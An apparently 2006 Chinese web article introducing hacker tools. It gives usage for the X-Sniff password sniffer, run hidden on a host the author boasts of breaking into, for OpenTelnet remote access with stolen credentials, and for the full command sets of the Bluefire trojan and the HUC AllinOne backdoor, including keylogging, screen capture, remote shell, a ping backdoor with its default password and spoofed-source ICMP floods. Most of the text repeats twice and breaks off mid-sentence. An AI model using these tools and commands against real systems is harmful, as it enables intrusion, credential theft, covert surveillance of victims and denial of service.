常用黑客工具介绍
时间:2006-06-02 来源:szhlwl
扫描类的有:
流光 X-way SuperScan X-Scan 生成字典类的有:
黑客字典 字典专家 超级字典生成器 生日密码生成器 嗅探监听类的有:
X-Sniff Winsniff ARp-Killer ARPSniffer MyNetmon NetXray 键盘纪录类的有:
广外幽灵 血火 代理和跳板类的有:
代理猎手 Snake 后门类的有:
Hall hacktelnet BackDoor Rmistaller winshell 蓝火 Win2000/NT密码破解类的有:
SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。 生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。
嗅探类的我挑X-Sniff来说: X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。 运行参数说明: xsniff <选项>
<选项>含义如下:
-tcp : 输出TCP数据报
-udp : 输出UDP数据报
-icmp : 输出ICMP数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr : 过滤IP地址
-port <端口> : 过滤端口
-log <文件名> : 将输出保存到文件
-asc : 以ASCII形式输出
-hex : 以16进制形式输出 比如: 我入侵了xx网吧的Host(这时已经telnet上去了,哈哈!爽啊~~HOHOHO!),输入: c:\xsniff.exe -hide -pass -log c:\winnt\pass.log 这句话的意思是监听所有通过这台主机的密码(哈哈!比不一会什么邮箱账号,游戏账号一大把啊)。并把截获到的密码放在c:\winnt目录下的password文件中!
键盘纪录的我比较喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。 代理的代理猎手是进行大面积的扫描代理只要输入IP范围就ok了! 后门类的我说说hacktelnet他有2个文件分别是OpenTelnet,ResumeTelnet。 OpenTelnet是用来打开对方的telnet只有知道了对方的用户名和密码还有存在空连接就可以这样使用: OpenTelnet.exe \\IP <帐号> <密码> :
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。 (假设IP为192.168.1.1,用户名为admin,密码是:123456) c:\opentelnet \\192.168.1.1 admin 123456 1 9000 这样我们就可以: c:\telnet 192.168.1.1 9000 如果对方的密码为空可以这样: c:\opentelnet \\192.168.1.1 admin "" 1 9000 另外那个ResumeTelnet是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法: ResumeTelnet.exe \\ip <帐号> <密码> 例如: c:\resumetelnet \\192.168.1.1 admin 123456 这下就可以了! 另外附带一下hall和蓝火的帮助文件。感兴趣的可以看看。
蓝色火焰0.5 Preview 2版帮助文档
================================== ●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是
------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的)! 接下来,喜欢上bbs或者mud的朋友就容易得多了,你把那台机当成一个bbs或者mud就可以了,只是要注意:端口是19191
简单点也行,跟着我来吧:
你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx 19191
这里xxx.xxx.xxx.xxx是你控制那台机的IP地址,怎么知道?$@#%#-----别问我哦,我也不知道哦。
端口是固定的19191,如果连上(也就是你可以为所欲为的),你就会看到如下画面:
***************“蓝色火焰”服务器端.***************
*************** 版本: V 0.5 Preview 2…… *************
*************** Copyright by Vinsa,2001.10******
Bluefire->
这是蓝色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的
========================================
命令详解帮助 : 1 help 显示简要帮助信息
2 exit 退出当前连接
3 ver 显示版本信息
4 list 列出当前进程
5 passwd 列出记录的密码信息
6 clearpw 清空记录的密码信息
7 sysinfo 列出计算机的详细信息
8 halt 挂起
9 screen 运行屏幕保护程序
10 sice? 检测是否运行了Soft-ice如果有就……
11 force 注销当前用户
12 logoff 注销
13 shutdown 关机
14 reboot 重启
15 poweroff 强行关机
----------------------------------------------------------
16 kill [Process ID]
杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list命令得到
----------------------------------------------------------
17 hide [desktop/taskbar/start/trayicon/clock]
隐藏……,如
隐藏桌面: hide desktop
隐藏任务栏: hide taskbar
隐藏开始按钮: hide start
隐藏右下角图标: hide trayicon
隐藏时钟: hide clock
----------------------------------------------------------
18 show [desktop/taskbar/start/trayicon/clock]
显示……
对应上面 ……
----------------------------------------------------------
19 disable [mouse/desktop/task/taskbar/start/cad]
锁定……
锁定鼠标: disable mouse
锁定桌面: disable desktop
锁定任务栏:disable task
锁定开始按钮:disable start
锁定Ctrl+Alt+delete: disable cad
----------------------------------------------------------
20 enabled [mouse/desktop/task/taskbar/start/cad]
把上面锁定的解锁
21 open [monitor/driver/ftp/http [dir]]
打开……
打开显示器: open monitor
打开光驱: open driver
打开Ftp服务器:
open ftp
打开后就可以用各种ftp客户端控制,
比如cuteFtp,leechftp,甚至Flashget的站点资源探素器都可以进行浏览和文件管理
打开http服务器:
open http c:\windows
这样表示以c:\windows为主目录进行web发布,
当然可以用IE,Netscape,Opera等等浏览器进行访问和下载文件
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★ 蓝色火焰0.4特色功能: 这一功能充满着幻想,用虚拟Web页的形式
实现了用 浏览器(IE,Netscape,Opera等):察看系统信息,察看(/清空)捕获的密码,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空)纪录的键盘,捕获屏幕,进程管理(列出/杀死进程),关闭计算机等功能
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
相当于由一般的TCP/IP协议控制的木马转变成用http协议控制超级木马,可以绕过一些防火墙,呵呵
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要open http 然后http://xxx.xxx.xxx.xxx就会出现控制选单!!! 然后一切都这么简单!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
也可以直接浏览捕获的屏幕图像
---------------------------------------
22 close [monitor/driver/ftp/http]
关闭……
对应上面的
---------------------------------------
23 catch [Jpeg Filename]
捕获当前屏幕
如 catch c:\screen.jpg
然后可以open http c: 打开http服务器,
在IE的地址栏里输入http://XXX.XXX.XXX.XXX/screen.jpg就可以浏览到屏幕图像
^^^^^^^^^^^^^^^
这些表示对方机器的IP地址 open http
打开IE输入http://xxx.xxx.xxx.xxx
选择抓取屏幕就ok了
---------------------------------------
24 changeb [on/off]
交换鼠标左右键changeb on
还原鼠标左右键changeb off
---------------------------------------25 charspy [result/on/off]
查看击键记录:charspy result
禁止键盘记录:charspy off
开启键盘记录:charspy on (注意默认情况下已经开启)
(记录各种按键,结果不存盘)
---------------------------------------26 keyspy [result/on/off/clear]
查看击键记录:keyspy result
禁止键盘记录:keyspy off
开启键盘记录:keyspy on (注意默认情况下已经开启)
清空键盘纪录:keyspy clear
(这里和上面不同的是这里可以记录中文输入,并将结果存盘)
------------------------------------- snapexe 设置EXE文件关连
28 unsnapexe 解除EXE文件关连
---------------------------------------29 bladd [filename]/blview/blclear
黑名单管理(在关连了exe文件后黑名单生效)
将程序加入黑名单用法:
bladd regedit(禁用注册表编辑器)
bladd skynet (禁用天网)
bladd msconfig
bladd qq2000 (这个太狠了,禁用oicq)
bladd windows(禁用windows目录下所有东西)
bladd ………………………………自己想加什么就加什么,看XXX不爽就bladd XXX 查看当前黑名单?blview
清空当前黑名单 blclear
--------------------------------------
30 recstart[wav filename]/recstop/recstate
开始录制一段声音: recstart c:\test.wav
结束录制 : recstop
显示录音机当前状态 : recstate
------------------------------------
31 cmd [dos command line]
运行dos命令:如
cmd dir
cmd type c:\test.txt
cmd del c:\msdos.sys(呵呵,这个删掉就麻烦了)
-------------- 32 run [filename]
运行命令 如:
run c:\test.wav
run c:\windows\system\msconfig.exe
run c:\screen.jpg
--------------------------------------
33 chat [messages you want to send]
打开聊天窗口和被控机聊天
用法很简单,如:
chat 你好
chat 你被我控制了
chat 你好可怜那
chat # (这个表示关闭聊天窗口)
--------------------------------------4 changetelnetport [port]
远程修改telnet端口
用法如 changetelnetport 23
表示把telnet端口修改为 23
服务端重启(restart)后生效
----------------------------------------------------------
35 changeftpport [port]
远程修改ftp端口
用法如 changeftpport 21
表示把ftp端口修改为 21
服务端重启(restart)后生效 -------------------------------------
36 changehttpport [port]
远程修改http端口
用法如 changehttpport 80
表示把http端口修改为 80
服务端重启(restart)后生效 --------------------------------------
37 changepasswd [new password]
远程修改telnet密码
用法如 changepasswd 123456
表示把telnet密码修改为 123456
服务端重启(restart)后生效 ------------------------------------
38 viewsetup
远程察看当前配置
-------------------------------------
39 restart
远程重启bluefire服务端,使修改的设置生效 ==================================== V0.5 Preview 2 版 快捷命令列表: l = list
k = kill
h = hide
s = show
c = catch
d = disable
e = enabled
! = cmd
r = run
: = chat
pw = passwd
cpw = clearpw
si = sysinfo
ks = keyspy
cs = chatspy
ks r = keyspy result
ks c = keyspy clear
cs r= charspy result
ctp = changetelnetport
cfp = changeftpport
chp = changehttpport
cpp = changepasswd =======================================
AllinOne V0.4 for Win2000 使用说明书.
by lion. ======================================
d:\>dir HAll.exe
驱动器 D 中的卷没有标签。
卷的序列号是 8084-DE58 d:\ 的目录 2002-05-10 17:53 62,976 HAll.exe
1 个文件 62,976 字节
0 个目录 619,315,200 可用字节 d:\>HAll -h
======================= HUC AllinOne V0.40 for Win2000 = By Lion, Welcome to http://***.*******.***================= [BackDoor:]
-start
-bind
-setup [ ]
[Files:]
-
[Flood:]
-
[Process:]
->
[System:]
-
[Scanner:]
-
[Services:]
-
[Transmit:]
- AllinOne 0.3功能介绍
------------------------------------------------------------------
1.Ping Backdoor(后门).
[BackDoor:]
1.1 本机默认安装一个ping backdoor.
-start
默认数据为:
密码为: kissme:)
监听包大小: 101
后门端口为: 138 1.2 本机开一个绑定了cmd shell的端口.
-bind <Password> <ListenPort>
<Password> 为验证密码.
<ListemPort> 为监听端口. 1.3 指定后门参数安装后门.
-setup [<TargetIP> <User> <Pass>] <ServiceName> <DisplayName> <Description> <Password> <ListenPort> <PackSize>
<ServerName> 为后门的服务名.
<DisplayName> 为服务显示的名称.
<Description> 为服务的描述.
<Password> 为控制密码.
<ListenPort> 为监听端口,为(1-65535).
<PackSize> 为监听包的大小,为(1-65000).
[<TargetIP> <User> <Pass>] 为远程安装选项,分别指定远程IP,用户名和密码.(必须为administrator). 1.4 ping 后门的使用方法为:
ping TargetIP -l 101 -n 1
telnet TargetIP 138
其中的101,138分别改成你设定的参数. ------------------------------------------------------------------
2. 文件操作.
[Files:] -<fget|safedel> <option> 2.1 下载Http或FTP文件功能.
-fget <URLFile|FTPFile> <LocalFile>
<URLFile> 为文件的Http地址.
<FTPFile> 为文件的FTP地址.
<LocalFile> 为下载文件要保存的路径和文件名. 2.2 安全擦除文件和目录功能.(从硬盘完全擦除)
-safedel [-p passes] [-s] <File or Directory>
-safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes 重写的次数, 默认为:3
-s 擦掉所有子目录.
-z 清除 ------------------------------------------------------------
3.DoS & Flood 功能.
[Flood:] -<ping|udp|syn|drdos> <option> 3.1 Ping Flood (为伪造源IP进行ICMP Ping 洪水攻击.)
-ping <SourceIP> <TargetIP> <PackSize> <Delay>
<SourceIP> 为要伪造的源IP,也就是将要攻击的IP.
<TargetIP> 为将要利用的主机IP, 最好为一个广播地址.如192.168.0.255
<Packsize> 为发送的ICMP包的大小.为(1-65000)
<Delay> 为发送数据包之间的延时.为(0-1000), 选0为无延时,推荐为1.
因为收到一个ICMP请求一般的主机都会返回一个回应.
如果一个广播地址192.168.0.255上有50台主机有ICMP回应,
%
流光 X-way SuperScan X-Scan 生成字典类的有:
黑客字典 字典专家 超级字典生成器 生日密码生成器 嗅探监听类的有:
X-Sniff Winsniff ARp-Killer ARPSniffer MyNetmon NetXray 键盘纪录类的有:
广外幽灵 血火 代理和跳板类的有:
代理猎手 Snake 后门类的有:
Hall hacktelnet BackDoor Rmistaller winshell 蓝火 Win2000/NT密码破解类的有:
SMBCrack
扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。 生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。
嗅探类的我挑X-Sniff来说: X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。 运行参数说明: xsniff <选项>
<选项>含义如下:
-tcp : 输出TCP数据报
-udp : 输出UDP数据报
-icmp : 输出ICMP数据报
-pass : 过滤密码信息
-hide : 后台运行
-host : 解析主机名
-addr : 过滤IP地址
-port <端口> : 过滤端口
-log <文件名> : 将输出保存到文件
-asc : 以ASCII形式输出
-hex : 以16进制形式输出 比如: 我入侵了xx网吧的Host(这时已经telnet上去了,哈哈!爽啊~~HOHOHO!),输入: c:\xsniff.exe -hide -pass -log c:\winnt\pass.log 这句话的意思是监听所有通过这台主机的密码(哈哈!比不一会什么邮箱账号,游戏账号一大把啊)。并把截获到的密码放在c:\winnt目录下的password文件中!
键盘纪录的我比较喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。 代理的代理猎手是进行大面积的扫描代理只要输入IP范围就ok了! 后门类的我说说hacktelnet他有2个文件分别是OpenTelnet,ResumeTelnet。 OpenTelnet是用来打开对方的telnet只有知道了对方的用户名和密码还有存在空连接就可以这样使用: OpenTelnet.exe \\IP <帐号> <密码> :
0: 不使用 NTLM 身份验证。
1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。
2: 只使用 NTLM 身份验证。 (假设IP为192.168.1.1,用户名为admin,密码是:123456) c:\opentelnet \\192.168.1.1 admin 123456 1 9000 这样我们就可以: c:\telnet 192.168.1.1 9000 如果对方的密码为空可以这样: c:\opentelnet \\192.168.1.1 admin "" 1 9000 另外那个ResumeTelnet是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法: ResumeTelnet.exe \\ip <帐号> <密码> 例如: c:\resumetelnet \\192.168.1.1 admin 123456 这下就可以了! 另外附带一下hall和蓝火的帮助文件。感兴趣的可以看看。
蓝色火焰0.5 Preview 2版帮助文档
================================== ●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是
------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的)! 接下来,喜欢上bbs或者mud的朋友就容易得多了,你把那台机当成一个bbs或者mud就可以了,只是要注意:端口是19191
简单点也行,跟着我来吧:
你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx 19191
这里xxx.xxx.xxx.xxx是你控制那台机的IP地址,怎么知道?$@#%#-----别问我哦,我也不知道哦。
端口是固定的19191,如果连上(也就是你可以为所欲为的),你就会看到如下画面:
***************“蓝色火焰”服务器端.***************
*************** 版本: V 0.5 Preview 2…… *************
*************** Copyright by Vinsa,2001.10******
Bluefire->
这是蓝色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的
========================================
命令详解帮助 : 1 help 显示简要帮助信息
2 exit 退出当前连接
3 ver 显示版本信息
4 list 列出当前进程
5 passwd 列出记录的密码信息
6 clearpw 清空记录的密码信息
7 sysinfo 列出计算机的详细信息
8 halt 挂起
9 screen 运行屏幕保护程序
10 sice? 检测是否运行了Soft-ice如果有就……
11 force 注销当前用户
12 logoff 注销
13 shutdown 关机
14 reboot 重启
15 poweroff 强行关机
----------------------------------------------------------
16 kill [Process ID]
杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list命令得到
----------------------------------------------------------
17 hide [desktop/taskbar/start/trayicon/clock]
隐藏……,如
隐藏桌面: hide desktop
隐藏任务栏: hide taskbar
隐藏开始按钮: hide start
隐藏右下角图标: hide trayicon
隐藏时钟: hide clock
----------------------------------------------------------
18 show [desktop/taskbar/start/trayicon/clock]
显示……
对应上面 ……
----------------------------------------------------------
19 disable [mouse/desktop/task/taskbar/start/cad]
锁定……
锁定鼠标: disable mouse
锁定桌面: disable desktop
锁定任务栏:disable task
锁定开始按钮:disable start
锁定Ctrl+Alt+delete: disable cad
----------------------------------------------------------
20 enabled [mouse/desktop/task/taskbar/start/cad]
把上面锁定的解锁
21 open [monitor/driver/ftp/http [dir]]
打开……
打开显示器: open monitor
打开光驱: open driver
打开Ftp服务器:
open ftp
打开后就可以用各种ftp客户端控制,
比如cuteFtp,leechftp,甚至Flashget的站点资源探素器都可以进行浏览和文件管理
打开http服务器:
open http c:\windows
这样表示以c:\windows为主目录进行web发布,
当然可以用IE,Netscape,Opera等等浏览器进行访问和下载文件
★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★ 蓝色火焰0.4特色功能: 这一功能充满着幻想,用虚拟Web页的形式
实现了用 浏览器(IE,Netscape,Opera等):察看系统信息,察看(/清空)捕获的密码,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空)纪录的键盘,捕获屏幕,进程管理(列出/杀死进程),关闭计算机等功能
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
相当于由一般的TCP/IP协议控制的木马转变成用http协议控制超级木马,可以绕过一些防火墙,呵呵
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要open http 然后http://xxx.xxx.xxx.xxx就会出现控制选单!!! 然后一切都这么简单!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★
也可以直接浏览捕获的屏幕图像
---------------------------------------
22 close [monitor/driver/ftp/http]
关闭……
对应上面的
---------------------------------------
23 catch [Jpeg Filename]
捕获当前屏幕
如 catch c:\screen.jpg
然后可以open http c: 打开http服务器,
在IE的地址栏里输入http://XXX.XXX.XXX.XXX/screen.jpg就可以浏览到屏幕图像
^^^^^^^^^^^^^^^
这些表示对方机器的IP地址 open http
打开IE输入http://xxx.xxx.xxx.xxx
选择抓取屏幕就ok了
---------------------------------------
24 changeb [on/off]
交换鼠标左右键changeb on
还原鼠标左右键changeb off
---------------------------------------25 charspy [result/on/off]
查看击键记录:charspy result
禁止键盘记录:charspy off
开启键盘记录:charspy on (注意默认情况下已经开启)
(记录各种按键,结果不存盘)
---------------------------------------26 keyspy [result/on/off/clear]
查看击键记录:keyspy result
禁止键盘记录:keyspy off
开启键盘记录:keyspy on (注意默认情况下已经开启)
清空键盘纪录:keyspy clear
(这里和上面不同的是这里可以记录中文输入,并将结果存盘)
------------------------------------- snapexe 设置EXE文件关连
28 unsnapexe 解除EXE文件关连
---------------------------------------29 bladd [filename]/blview/blclear
黑名单管理(在关连了exe文件后黑名单生效)
将程序加入黑名单用法:
bladd regedit(禁用注册表编辑器)
bladd skynet (禁用天网)
bladd msconfig
bladd qq2000 (这个太狠了,禁用oicq)
bladd windows(禁用windows目录下所有东西)
bladd ………………………………自己想加什么就加什么,看XXX不爽就bladd XXX 查看当前黑名单?blview
清空当前黑名单 blclear
--------------------------------------
30 recstart[wav filename]/recstop/recstate
开始录制一段声音: recstart c:\test.wav
结束录制 : recstop
显示录音机当前状态 : recstate
------------------------------------
31 cmd [dos command line]
运行dos命令:如
cmd dir
cmd type c:\test.txt
cmd del c:\msdos.sys(呵呵,这个删掉就麻烦了)
-------------- 32 run [filename]
运行命令 如:
run c:\test.wav
run c:\windows\system\msconfig.exe
run c:\screen.jpg
--------------------------------------
33 chat [messages you want to send]
打开聊天窗口和被控机聊天
用法很简单,如:
chat 你好
chat 你被我控制了
chat 你好可怜那
chat # (这个表示关闭聊天窗口)
--------------------------------------4 changetelnetport [port]
远程修改telnet端口
用法如 changetelnetport 23
表示把telnet端口修改为 23
服务端重启(restart)后生效
----------------------------------------------------------
35 changeftpport [port]
远程修改ftp端口
用法如 changeftpport 21
表示把ftp端口修改为 21
服务端重启(restart)后生效 -------------------------------------
36 changehttpport [port]
远程修改http端口
用法如 changehttpport 80
表示把http端口修改为 80
服务端重启(restart)后生效 --------------------------------------
37 changepasswd [new password]
远程修改telnet密码
用法如 changepasswd 123456
表示把telnet密码修改为 123456
服务端重启(restart)后生效 ------------------------------------
38 viewsetup
远程察看当前配置
-------------------------------------
39 restart
远程重启bluefire服务端,使修改的设置生效 ==================================== V0.5 Preview 2 版 快捷命令列表: l = list
k = kill
h = hide
s = show
c = catch
d = disable
e = enabled
! = cmd
r = run
: = chat
pw = passwd
cpw = clearpw
si = sysinfo
ks = keyspy
cs = chatspy
ks r = keyspy result
ks c = keyspy clear
cs r= charspy result
ctp = changetelnetport
cfp = changeftpport
chp = changehttpport
cpp = changepasswd =======================================
AllinOne V0.4 for Win2000 使用说明书.
by lion. ======================================
d:\>dir HAll.exe
驱动器 D 中的卷没有标签。
卷的序列号是 8084-DE58 d:\ 的目录 2002-05-10 17:53 62,976 HAll.exe
1 个文件 62,976 字节
0 个目录 619,315,200 可用字节 d:\>HAll -h
======================= HUC AllinOne V0.40 for Win2000 = By Lion, Welcome to http://***.*******.***================= [BackDoor:]
-start
-bind
-setup [ ]
[Files:]
-
[Flood:]
-
[Process:]
->
[System:]
-
[Scanner:]
-
[Services:]
-
[Transmit:]
- AllinOne 0.3功能介绍
------------------------------------------------------------------
1.Ping Backdoor(后门).
[BackDoor:]
1.1 本机默认安装一个ping backdoor.
-start
默认数据为:
密码为: kissme:)
监听包大小: 101
后门端口为: 138 1.2 本机开一个绑定了cmd shell的端口.
-bind <Password> <ListenPort>
<Password> 为验证密码.
<ListemPort> 为监听端口. 1.3 指定后门参数安装后门.
-setup [<TargetIP> <User> <Pass>] <ServiceName> <DisplayName> <Description> <Password> <ListenPort> <PackSize>
<ServerName> 为后门的服务名.
<DisplayName> 为服务显示的名称.
<Description> 为服务的描述.
<Password> 为控制密码.
<ListenPort> 为监听端口,为(1-65535).
<PackSize> 为监听包的大小,为(1-65000).
[<TargetIP> <User> <Pass>] 为远程安装选项,分别指定远程IP,用户名和密码.(必须为administrator). 1.4 ping 后门的使用方法为:
ping TargetIP -l 101 -n 1
telnet TargetIP 138
其中的101,138分别改成你设定的参数. ------------------------------------------------------------------
2. 文件操作.
[Files:] -<fget|safedel> <option> 2.1 下载Http或FTP文件功能.
-fget <URLFile|FTPFile> <LocalFile>
<URLFile> 为文件的Http地址.
<FTPFile> 为文件的FTP地址.
<LocalFile> 为下载文件要保存的路径和文件名. 2.2 安全擦除文件和目录功能.(从硬盘完全擦除)
-safedel [-p passes] [-s] <File or Directory>
-safedel [-p passes] -z [Drive Letter]
[Opation:]
-p passes 重写的次数, 默认为:3
-s 擦掉所有子目录.
-z 清除 ------------------------------------------------------------
3.DoS & Flood 功能.
[Flood:] -<ping|udp|syn|drdos> <option> 3.1 Ping Flood (为伪造源IP进行ICMP Ping 洪水攻击.)
-ping <SourceIP> <TargetIP> <PackSize> <Delay>
<SourceIP> 为要伪造的源IP,也就是将要攻击的IP.
<TargetIP> 为将要利用的主机IP, 最好为一个广播地址.如192.168.0.255
<Packsize> 为发送的ICMP包的大小.为(1-65000)
<Delay> 为发送数据包之间的延时.为(0-1000), 选0为无延时,推荐为1.
因为收到一个ICMP请求一般的主机都会返回一个回应.
如果一个广播地址192.168.0.255上有50台主机有ICMP回应,
%
相关阅读 更多 +
